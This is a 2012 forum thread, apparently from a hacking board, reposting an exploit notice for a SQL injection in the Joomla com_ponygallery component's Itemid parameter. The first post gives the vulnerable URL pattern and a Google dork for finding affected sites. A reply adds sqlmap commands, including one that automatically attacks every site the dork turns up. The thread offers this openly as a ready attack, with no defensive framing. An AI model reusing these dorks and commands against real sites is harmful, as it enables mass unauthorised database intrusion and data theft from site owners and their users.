The_Arhitect Posted April 16, 2012 Report Posted April 16, 2012 joomla component (com_ponygallery) SQL injection Vulnerability################################################### Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability# Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2# Date: 11/04/2012# Author: xDarkSton3x# E-mail : xdarkston3x@msn.com# Category: webapps# Google dork: inurl:"com_ponygallery"##################################################[~]Exploit/p0c :http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli]Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed - RemoteExecution ] [ Dedalo - Maztor ]Sursa: joomla component (com_ponygallery) SQL injection Vulnerability Quote
backdoor Posted April 18, 2012 Report Posted April 18, 2012 Google dork allinurl:index.php?option=com_ponygallerymanual sqlmap:/sqlmap.py --dbms=mysql -p Itemid -u "http://website.com/index.php?option=com_ponygallery&func=viewcategory&catid=4&Itemid=56"sqlmap automation:./sqlmap.py --dbms=mysql -p Itemid -g allinurl:index.php?option=com_ponygallery Quote